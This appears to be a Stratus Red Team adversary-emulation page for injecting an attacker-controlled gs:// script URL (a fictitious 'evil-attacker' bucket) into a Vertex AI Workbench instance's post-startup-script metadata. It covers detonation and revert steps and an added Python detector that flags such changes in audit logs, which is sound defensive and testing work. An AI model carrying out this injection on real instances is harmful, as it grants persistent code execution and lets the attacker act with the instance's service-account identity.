
Inject a Malicious Startup Script into a Vertex AI Workbench Instance

slow

Platform: GCP

Mappings

  • MITRE ATT&CK
    • Execution
    • Privilege Escalation

Description

Modifies a Vertex AI Workbench (user-managed notebook) instance so that it executes a remote script on its next start, by injecting an attacker-controlled URL into the instance's post-startup-script metadata key. An attacker holding the notebooks.instances.update permission can use this technique to gain persistent code execution inside the notebook environment. Because the injected script runs on the instance itself, it can request tokens for the instance's attached service account from the metadata server and act with that identity.

Warm-up:

  • Create a Vertex AI Workbench instance (e2-standard-2, us-central1-a)

Note: This technique requires the Notebooks API (notebooks.googleapis.com) to be enabled in your GCP project. If it is not enabled, the warm-up will fail with a 403 error pointing to the API enablement page.

Detonation:

  • Patch the Workbench instance's GCE setup metadata to set post-startup-script to a fictitious attacker-controlled GCS URI (gs://evil-attacker-<project-id>-<random>/malicious.sh)

Revert:

  • Remove the post-startup-script metadata key from the instance


Instructions

Detonate with Stratus Red Team
stratus detonate gcp.execution.modify-vertex-notebook-startup

Detection

Identify changes to a Vertex AI Workbench instance's metadata by monitoring GCP Admin Activity audit logs for google.cloud.notebooks.v2.NotebookService.UpdateInstance events. Alert when the request adds or changes the post-startup-script or startup-script metadata key, especially when the new value is an external URL (gs://, http:// or https://) pointing outside the buckets your platform team uses for bootstrap scripts, since that may indicate an attempt to establish persistent code execution in the notebook environment. The injected script only runs on the next start, so an UpdateInstance followed shortly by a stop and start of the same instance by the same principal is a stronger signal than the metadata change alone.
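The detection logic described above, as an added example (this is not Stratus Red Team code and not a finished detection rule). It scans newline-delimited Admin Activity audit log entries for the v2 UpdateInstance method, pulls the watched metadata keys out of the request, and grades each one: a remote URL from an unknown bucket is high, a remote URL from a known bootstrap bucket is informational, and an inline script is low. The request field path (instance.gceSetup.metadata), the trusted bucket name and the sample entries are all constructed assumptions; check the path against a real entry from your project before deploying.

```python
"""Flag Vertex AI Workbench startup-script changes in Admin Activity audit logs.

Added example, not code from Stratus Red Team. Field paths and sample entries
are assumptions modelled on the Cloud Logging audit record shape.
"""
import json
from urllib.parse import urlparse

# Method the page says to monitor. Widen this set if your logs also show the
# v1 user-managed notebook methods (assumption: verify against real entries).
WATCHED_METHODS = {
    "google.cloud.notebooks.v2.NotebookService.UpdateInstance",
}
WATCHED_KEYS = ("post-startup-script", "startup-script")
REMOTE_SCHEMES = {"gs", "http", "https"}
# Buckets your platform team legitimately serves bootstrap scripts from
# (assumed name; replace with your own allowlist).
TRUSTED_BUCKETS = {"corp-notebook-bootstrap"}


def classify_script_value(value: str) -> tuple[bool, str]:
    """Return (is_remote, location) for a startup-script metadata value.

    Workbench accepts either inline script content or a URL. Only a URL
    pulls code from outside the instance, so that is what gets graded.
    """
    parsed = urlparse(value.strip())
    if parsed.scheme in REMOTE_SCHEMES and parsed.netloc:
        return True, parsed.netloc
    return False, ""


def find_startup_script_changes(entry: dict) -> list[dict]:
    """Return findings for one audit log entry (empty when nothing matches)."""
    payload = entry.get("protoPayload", {})
    if payload.get("methodName") not in WATCHED_METHODS:
        return []
    request = payload.get("request", {})
    # Assumed request layout for v2 UpdateInstance: instance.gceSetup.metadata.
    metadata = request.get("instance", {}).get("gceSetup", {}).get("metadata", {})
    principal = payload.get("authenticationInfo", {}).get("principalEmail", "unknown")
    findings = []
    for key in WATCHED_KEYS:
        if key not in metadata:
            continue
        value = str(metadata[key])
        is_remote, location = classify_script_value(value)
        if not is_remote:
            severity = "low"    # inline script: a change, but no external fetch
        elif location in TRUSTED_BUCKETS:
            severity = "info"   # known bootstrap bucket
        else:
            severity = "high"   # remote script from an unrecognised location
        findings.append({
            "severity": severity,
            "instance": payload.get("resourceName", ""),
            "principal": principal,
            "key": key,
            "value": value,
            "timestamp": entry.get("timestamp", ""),
        })
    return findings


def scan_log_lines(lines) -> list[dict]:
    """Parse newline-delimited JSON audit entries and collect all findings."""
    findings = []
    for line in lines:
        line = line.strip()
        if line:
            findings.extend(find_startup_script_changes(json.loads(line)))
    return findings


# Constructed sample entries (not real log data). The gs:// bucket in the first
# entry is fictitious; the last entry is a start operation with no metadata.
SAMPLE_LOG = """
{"timestamp": "2024-05-01T10:00:00Z", "protoPayload": {"methodName": "google.cloud.notebooks.v2.NotebookService.UpdateInstance", "resourceName": "projects/demo-proj/locations/us-central1-a/instances/nb-1", "authenticationInfo": {"principalEmail": "attacker@example.com"}, "request": {"updateMask": "gceSetup.metadata", "instance": {"gceSetup": {"metadata": {"post-startup-script": "gs://evil-attacker-demo-proj-4f2a/malicious.sh"}}}}}}
{"timestamp": "2024-05-01T10:05:00Z", "protoPayload": {"methodName": "google.cloud.notebooks.v2.NotebookService.UpdateInstance", "resourceName": "projects/demo-proj/locations/us-central1-a/instances/nb-2", "authenticationInfo": {"principalEmail": "platform-sa@demo-proj.iam.gserviceaccount.com"}, "request": {"updateMask": "gceSetup.metadata", "instance": {"gceSetup": {"metadata": {"post-startup-script": "gs://corp-notebook-bootstrap/init.sh"}}}}}}
{"timestamp": "2024-05-01T10:10:00Z", "protoPayload": {"methodName": "google.cloud.notebooks.v2.NotebookService.UpdateInstance", "resourceName": "projects/demo-proj/locations/us-central1-a/instances/nb-3", "authenticationInfo": {"principalEmail": "dev@example.com"}, "request": {"updateMask": "gceSetup.metadata", "instance": {"gceSetup": {"metadata": {"startup-script": "#!/bin/bash\\necho hello"}}}}}}
{"timestamp": "2024-05-01T10:15:00Z", "protoPayload": {"methodName": "google.cloud.notebooks.v2.NotebookService.StartInstance", "resourceName": "projects/demo-proj/locations/us-central1-a/instances/nb-1", "authenticationInfo": {"principalEmail": "attacker@example.com"}, "request": {"name": "projects/demo-proj/locations/us-central1-a/instances/nb-1"}}}
"""

if __name__ == "__main__":
    for f in scan_log_lines(SAMPLE_LOG.splitlines()):
        print(f"[{f['severity']}] {f['principal']} set {f['key']}={f['value']} on {f['instance']}")
```

The allowlist matters in practice: post-startup-script is a legitimate bootstrap mechanism, so alerting on every change produces noise, while alerting only on buckets you do not recognise keeps the signal. Note that the same key can also be set at creation time through CreateInstance, which this filter deliberately does not cover; add that method to WATCHED_METHODS if you want creation-time injection flagged as well.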